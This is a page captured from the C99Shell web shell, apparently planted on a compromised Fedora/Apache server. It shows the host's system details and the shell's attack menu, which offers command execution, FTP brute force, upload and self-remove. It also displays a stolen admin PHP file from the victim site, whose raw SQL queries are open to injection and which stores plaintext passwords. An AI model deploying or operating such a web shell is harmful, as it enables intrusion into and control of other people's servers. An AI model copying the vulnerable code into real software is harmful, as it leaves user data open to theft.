!C99Shell v. 1.0 pre-release build #16!

Software: Apache/2.0.54 (Fedora). PHP/5.0.4 

uname -a: Linux mina-info.me 2.6.17-1.2142_FC4smp #1 SMP Tue Jul 11 22:57:02 EDT 2006 i686 

uid=48(apache) gid=48(apache) groups=48(apache)
context=system_u:system_r:httpd_sys_script_t
 

Safe-mode: OFF (not secure)

/home/mnnews/public_html/mina/test/admin/   drwxr-xr-x
Free 3.9 GB of 27.03 GB (14.42%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     addSpooledUsers.inc.php3 (2.34 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
  
  
if(checkSuperSession($superSession, $REMOTE_ADDR))
    {
      
      include(
"include/rootGui.inc.php3");
       

      
$userId = getUserSUId($superSession);
      
$userInfo = getUserInfo($userId);

      if((
$userInfo[SuperUser] == 1) && ($userInfo[manageUsers]==1) && ($userInfo[active]==1))
    {

      require(
"$mysqlCall");
      
      
$query = "SELECT * FROM $spooledUsers WHERE ID=$userId";
      
      
$mysql_result = mysql_query($query, $mysql_link);
      
      
      if(
$row = mysql_fetch_row($mysql_result))
        {
          
          
$item_ID =    $row[0];
          
$item_user =     $row[1];
          
$item_pass =     $row[2];
          
$item_email =     $row[3];
          


      
          
//print("$item_pass");
          
          
          
$noSU=0;
          
          
          
mail($item_email, "Comfirm rego", $confirmRego);
          

          
$zipo = 0;
          
$one = 1;

          
$insert = "insert into $users values('', '$item_user', '$item_pass', '$zipo', '$item_email','$zipo', '$one','$zipo', '$zipo', '$zipo','$zipo', '$zipo','$zipo')";
          
          
$result = MYSQL_QUERY($insert);        
          
          if(
$result)
        {
          
          
$query =  "SELECT * FROM $spooledUsers WHERE(ID LIKE '%$userId%')";
          
          
$insert = MYSQL_QUERY($query);
          
          
$ID = mysql_result($insert,$i, "ID");
          
          
          
$result = MYSQL_QUERY($insert);
          
$query = "DELETE FROM $spooledUsers WHERE(ID=$userId)";
          
$insert = MYSQL_QUERY($query);
          
          print(
"Unijeto");
          
          
$noItems=0;        
        
          
$query =  "SELECT * FROM $users WHERE user='$item_user'";
          
          
$result = MYSQL_QUERY($query);
          
          if(
$row = mysql_fetch_row($result))
            {
              
$userId = $row[0];
            }

          
$userInfo = getUserInfo($userId);
          
          include(
"userValues.inc.php3");
          
          print(
"user = $user");
          
          include(
"users.php3");




  
        
/*   print "<META HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=index.php3?mode=listSpooledUsers&superSession=$superSession\">"; */
      
        
}
      
        }
      
      else
        {
          
          print(
"Doslo je do greske");
      
        }
      
    }
      else
    {
      print(
"Nemate pristup ovoj funkciji");
    }
       include(
"include/guiBase.inc.php3");

    }
  
  
  else
    {
      
//session is bad
      
print("Pogresna sesija ID ($superSession)!<BR>\n");
      
$superSession = "";
    }
  



?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0159 ]--